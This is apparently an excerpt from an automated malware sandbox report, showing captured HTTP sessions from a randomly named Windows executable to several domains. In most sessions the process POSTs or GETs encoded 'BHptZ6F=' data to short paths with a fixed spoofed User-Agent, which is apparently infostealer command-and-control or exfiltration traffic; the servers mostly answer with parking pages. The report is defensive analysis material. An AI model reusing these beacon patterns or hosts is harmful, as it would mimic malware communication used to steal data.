                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 69 43 51 32 47 36 4f 4b 54 35 6e 57 37 51 69 6b 51 65 43 53 51 38 79 68 7a 4f 4a 67 67 78 64 6c 63 36 42 64 32 4d 69 2b 4c 4a 34 41 47 79 50 70 5a 4e 48 52 76 6e 39 63 6d 30 34 55 6c 64 4e 2b 47 73 65 53 47 30 47 79 5a 51 79 56 31 68 44 59 69 74 6f 37 71 78 4a 75 31 62 38 52 35 64 47 45 38 6e 59 2b 64 50 5a 4a 6a 6a 31 74 30 32 73 72 46 5a 72 30 36 34 35 61 50 73 43 2f 39 5a 72 39 43 2b 63 4c 6e 2f 42 33 37 41 62 69 54 74 42 2f 66 77 2b 34 70 72 51 70 47 37 77 6e 73 77 67 4f 37 46 71 4f 42 6b 7a 34 49 76 2f 33 52 69 47 47 68 4b 6a 74 37 61 7a 35 51 6f 43 56 4c 69 2f 77 4c 52 6d 55 77 65 4f 75 58 32 77 3d
                                                                            Data Ascii: BHptZ6F=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxdlc6Bd2Mi+LJ4AGyPpZNHRvn9cm04UldN+GseSG0GyZQyV1hDYito7qxJu1b8R5dGE8nY+dPZJjj1t02srFZr0645aPsC/9Zr9C+cLn/B37AbiTtB/fw+4prQpG7wnswgO7FqOBkz4Iv/3RiGGhKjt7az5QoCVLi/wLRmUweOuX2w=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.12 | 49898 | 172.67.162.39 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:06.510576010 CET | 1823 | OUT | POST /k4tn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.sitioseguro.blog
Origin: http://www.sitioseguro.blog
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 1236
Referer: http://www.sitioseguro.blog/k4tn/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.12 | 49908 | 172.67.162.39 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:09.171531916 CET | 518 | OUT | GET /k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.sitioseguro.blog
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 6, 2024 17:38:11.821933985 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 06 Dec 2024 16:38:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2lGTZStjYhWCBqll1jtRlQvwmz5W%2FZyOMhryFF%2BaT5lvS2nrKgABPdf0m%2F2xi4KKl7Nvf%2BTaKSsKXuTtWoKBWcCMArTra5WjUfu6X3bVBJ2D%2FSP29EdgUEm3RgZ9RuHzBbH81iN7w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eddb4692c8972c2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=518&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: b50<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,l
Dec 6, 2024 17:38:11.821950912 CET | 1236 | IN | Data Ascii: abel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-
Dec 6, 2024 17:38:11.821973085 CET | 1236 | IN | Data Ascii: .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-hei
Dec 6, 2024 17:38:11.821984053 CET | 39 | IN | Data Ascii: adding-left:.6875rem}.window-main__it
Dec 6, 2024 17:38:11.852727890 CET | 1236 | IN | Data Ascii: 1657em{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-l
Dec 6, 2024 17:38:11.852749109 CET | 1236 | IN | Data Ascii: 78049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20re
Dec 6, 2024 17:38:11.852761030 CET | 1236 | IN | Data Ascii: .625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem +
Dec 6, 2024 17:38:11.852910995 CET | 1236 | IN | Data Ascii: argin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid
Dec 6, 2024 17:38:11.852924109 CET | 783 | IN | Data Ascii: 92 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filterUnits=
Dec 6, 2024 17:38:11.885850906 CET | 1236 | IN | Data Ascii: b4b<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.
Dec 6, 2024 17:38:11.942487001 CET | 1236 | IN | Data Ascii: the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></d


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.12 | 49929 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:17.844314098 CET | 808 | OUT | POST /tskk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.dating-apps-az-dn5.xyz
Origin: http://www.dating-apps-az-dn5.xyz
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 204
Referer: http://www.dating-apps-az-dn5.xyz/tskk/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F=l7uh9+O+PwAoCGFzVrIFWiGt/CSLQCSDQfrvf1NsgW/hO1maAqXyP+2tnUN9aCBEaF2RhuNBZveB7R4RYYUUox0GmFwNhHcOjX2SKQjBkOQzW1Ic231jMx1WZ46oQFxKcoUhUlw8cA6np/R1DdQJWT4zxOySZdr1VHNA7Yginw/pfQoKkVQqk8+hurlOUM/Wkw==
Dec 6, 2024 17:38:18.925440073 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 06 Dec 2024 16:38:18 GMT
content-type: text/html; charset=utf-8
content-length: 1154
x-request-id: 35a1b107-773f-42e3-bff4-0e6910b6902e
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
set-cookie: parking_session=35a1b107-773f-42e3-bff4-0e6910b6902e; expires=Fri, 06 Dec 2024 16:53:18 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 17:38:18.925489902 CET | 607 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzVhMWIxMDctNzczZi00MmUzLWJmZjQtMGU2OTEwYjY5MDJlIiwicGFnZV90aW1lIjoxNzMzNTAzMD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.12 | 49935 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:20.509768009 CET | 828 | OUT | POST /tskk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.dating-apps-az-dn5.xyz
Origin: http://www.dating-apps-az-dn5.xyz
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 224
Referer: http://www.dating-apps-az-dn5.xyz/tskk/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F=l7uh9+O+PwAoDkRzWIgFBSGqziSLCCTKQf3vfw98hlbhOUWaBovyM+2t/EN8UiBDaFK3hsZBZu6B7TwRfrsXoh0Erlw1vncOjX2SKQmUkOIzVFYc5zZgFR1ZJo6oUFwDcoUHUksScCynp7B1DpMOcT41/uyCIOKCVxZp1pkAsCP9X2lQ7nY8x/qsj8c+ZPCf/xsNVOdzYwnbft3oHHki5+k=
Dec 6, 2024 17:38:21.596107960 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 06 Dec 2024 16:38:20 GMT
content-type: text/html; charset=utf-8
content-length: 1154
x-request-id: c97dc733-2c67-4f39-b009-044e2c94be17
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
set-cookie: parking_session=c97dc733-2c67-4f39-b009-044e2c94be17; expires=Fri, 06 Dec 2024 16:53:21 GMT; path=/
connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 17:38:21.596133947 CET | 607 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzk3ZGM3MzMtMmM2Ny00ZjM5LWIwMDktMDQ0ZTJjOTRiZTE3IiwicGFnZV90aW1lIjoxNzMzNTAzMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.12 | 49941 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:23.180535078 CET | 1841 | OUT | POST /tskk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.dating-apps-az-dn5.xyz
Origin: http://www.dating-apps-az-dn5.xyz
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 1236
Referer: http://www.dating-apps-az-dn5.xyz/tskk/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F= [TRUNCATED]
Dec 6, 2024 17:38:24.271527052 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 06 Dec 2024 16:38:23 GMT
content-type: text/html; charset=utf-8
content-length: 1154
x-request-id: ca7b2e67-8785-459a-8706-47fa4ad1362e
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
set-cookie: parking_session=ca7b2e67-8785-459a-8706-47fa4ad1362e; expires=Fri, 06 Dec 2024 16:53:24 GMT; path=/
connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 6b 35 43 61 5a 68 38 79 65 55 34 38 7a 4d 63 4b 37 77 53 51 73 6b 74 51 70 56 73 5a 4b 6b 47 5a 32 42 64 66 63 48 5a 48 76 6f 4c 31 6d 42 59 72 6a 64 48 72 4c 73 76 49 32 6c 45 37 6c 33 47 30 4f 77 38 5a 52 76 6c 46 39 49 2f 69 2f 50 6c 46 67 56 52 4a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:24.271774054 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E3YjJlNjctODc4NS00NTlhLTg3MDYtNDdmYTRhZDEzNjJlIiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            32 | 192.168.2.12 | 49948 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:25.846615076 CET | 524 | OUT | GET /tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.dating-apps-az-dn5.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:38:26.938834906 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 06 Dec 2024 16:38:26 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1494
                                                                            x-request-id: 0ba3d5cf-77fd-44d5-bd56-187610cd6dbb
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EFn0DTHhx+p6pY71uVqWKgcT1Lrm4WC0eH1MRRr6zkwokKN/480W300KZCxG096cUCwcyKH2IpiF0gOEJwpcLA==
                                                                            set-cookie: parking_session=0ba3d5cf-77fd-44d5-bd56-187610cd6dbb; expires=Fri, 06 Dec 2024 16:53:26 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 46 6e 30 44 54 48 68 78 2b 70 36 70 59 37 31 75 56 71 57 4b 67 63 54 31 4c 72 6d 34 57 43 30 65 48 31 4d 52 52 72 36 7a 6b 77 6f 6b 4b 4e 2f 34 38 30 57 33 30 30 4b 5a 43 78 47 30 39 36 63 55 43 77 63 79 4b 48 32 49 70 69 46 30 67 4f 45 4a 77 70 63 4c 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EFn0DTHhx+p6pY71uVqWKgcT1Lrm4WC0eH1MRRr6zkwokKN/480W300KZCxG096cUCwcyKH2IpiF0gOEJwpcLA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:26.938864946 CET | 947 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGJhM2Q1Y2YtNzdmZC00NGQ1LWJkNTYtMTg3NjEwY2Q2ZGJiIiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            33 | 192.168.2.12 | 49964 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:32.832287073 CET | 784 | OUT | POST /27s6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.whisperart.net
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.whisperart.net/27s6/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 4d 30 44 6f 71 6c 42 41 31 6f 4a 52 50 72 2b 48 4a 2b 51 49 64 77 6d 54 63 78 66 4a 35 79 61 4d 5a 6e 4a 7a 76 6b 52 39 78 45 75 5a 6b 7a 38 38 62 6f 52 42 39 46 4d 54 35 64 66 54 59 63 4c 4b 54 79 74 65 71 58 57 4f 76 34 7a 44 6b 70 68 49 52 74 42 6f 37 6f 57 38 74 78 53 50 69 2b 4c 76 48 71 72 4c 56 35 36 63 7a 74 45 75 35 33 4c 31 4d 57 4d 65 5a 45 65 57 72 5a 74 72 48 75 53 31 76 67 50 6e 56 72 45 33 46 50 5a 55 64 54 39 43 36 63 58 54 6c 67 47 71 50 7a 78 55 67 70 33 5a 72 6b 5a 66 4d 58 41 46 4f 2b 73 38 2b 2f 48 33 31 78 57 63 58 41 3d 3d
                                                                            Data Ascii: BHptZ6F=6FnJpi9V/PzcM0DoqlBA1oJRPr+HJ+QIdwmTcxfJ5yaMZnJzvkR9xEuZkz88boRB9FMT5dfTYcLKTyteqXWOv4zDkphIRtBo7oW8txSPi+LvHqrLV56cztEu53L1MWMeZEeWrZtrHuS1vgPnVrE3FPZUdT9C6cXTlgGqPzxUgp3ZrkZfMXAFO+s8+/H31xWcXA==
                                                                            Dec 6, 2024 17:38:33.910063982 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 06 Dec 2024 16:38:32 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 7054b1ab-7b6c-49b4-b7a8-71604cbc6e8a
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
